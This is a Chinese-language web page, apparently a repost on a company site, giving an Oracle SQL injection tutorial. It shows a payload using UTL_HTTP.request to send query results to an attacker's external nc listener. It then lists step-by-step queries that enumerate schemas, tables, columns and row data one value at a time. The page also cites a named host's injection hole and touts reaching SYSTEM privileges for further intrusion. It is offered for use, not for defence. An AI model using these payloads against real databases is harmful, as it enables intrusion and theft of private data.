RELATEED CONSULTING
相关咨询
选择下列产品马上在线沟通
服务时间:8:30-17:00
你可能遇到了下面的问题
关闭右侧工具栏

新闻中心

这里有您想知道的互联网营销解决方案
Oracle注射技术——Oracle+nc注射

首先外网nc监听对应的端口

and UTL_HTTP.request('外网ip:port/'||(sql语句))=1--

爆库:

select owner from all_tables where rownum=1
select owner from all_tables where owner<>'第一个库名' 
and rownum=1
select owner from all_tables where owner<>'第一个库名' 
and owner<>'第二个'and rownum=1
select owner from all_tables where owner<>'第一个库名' 
and owner<>'第一个库名' and rownum=1

以此论推

爆表

select TABLE_NAME from all_tables where owner='库名'
and rownum=1
select TABLE_NAME from all_tables where owner='库名'
and rownum=1 and TABLE_NAME<>'表名1'
select TABLE_NAME from all_tables where owner='库名'and rownum=1 
and TABLE_NAME<>'表名1' and TABLE_NAME<>'表名2'

以此论推

爆列:

select COLUMN_NAME from user_tab_columns where table_name='表名' 
and rownum=1
select COLUMN_NAME from user_tab_columns where table_name='表名' 
and rownum=1 and COLUMN_NAME<>'第一个爆出的列名'
select COLUMN_NAME from user_tab_columns where table_name='表名' 
and rownum=1 and COLUMN_NAME<>'第一个爆出的列名' and COLUMN_NAME<>'第二个爆出的列名'

爆内容:

第一个内容:select 列名 from 表名 where rownum=1

第二个内容:select 列名 from 表名 where rownum=1 and 列名<>'第一个值'

第三个内容:select 列名 from 表名 where rownum=1 and 列名<>'第一个值' and 列名<>'第二个值'

以此论推

现在大家转过头来看下“万网的尴尬-万网ORACLE注入漏洞曝光http://bbs.exploits.com.cn/read.php?tid-144.html

是不是很明了了...o(∩_∩)o...哈哈

注:

1:在windows环境下,oracle是以服务的形式启动的,这样通过web注射就可以直接获得system权限(此部分内容正在整理测试阶段中,以供给大家更直观、简洁、有效的参考资料

2:针对unix和linux操作系统方面对于Oracle也会作出分析,相信Oracle注射将会成为转入高级Hack入侵的桥梁

3.这是个系列文章,后文有待更新


文章名称:Oracle注射技术——Oracle+nc注射
URL标题:http://www.jxjierui.cn/article/djddgpg.html